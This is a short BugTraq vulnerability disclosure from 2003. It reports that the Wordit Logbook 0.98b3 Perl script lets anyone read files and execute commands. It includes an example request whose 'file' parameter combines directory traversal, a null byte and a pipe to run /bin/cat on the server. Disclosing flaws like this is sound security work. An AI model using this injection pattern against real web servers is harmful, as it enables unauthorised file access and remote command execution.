BugTraq
Back to list
|
Post reply
Wordit Logbook Version 0.98b3
Mar 07 2003 08:22AM
Aleksey Sintsov (theforce s-mail com)
#############################
#Wordit Limited 2000. #
#http://scripts.wordit.com/ #
#############################
User can read any files and execute any commands.
Example: www.i_dont_know_perl.com/logbook.pl?
file=../../../../../../../bin/cat%20logbook.pl%00|
/*
Alexey Sintsov aka Don_Huan
irc.megik.net
#brrr
*/
#include <best/regards.h>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#############################
#Wordit Limited 2000. #
#http://scripts.wordit.com/ #
#############################
User can read any files and execute any commands.
Example: www.i_dont_know_perl.com/logbook.pl?
file=../../../../../../../bin/cat%20logbook.pl%00|
/*
Alexey Sintsov aka Don_Huan
irc.megik.net
#brrr
*/
#include <best/regards.h>
[ reply ]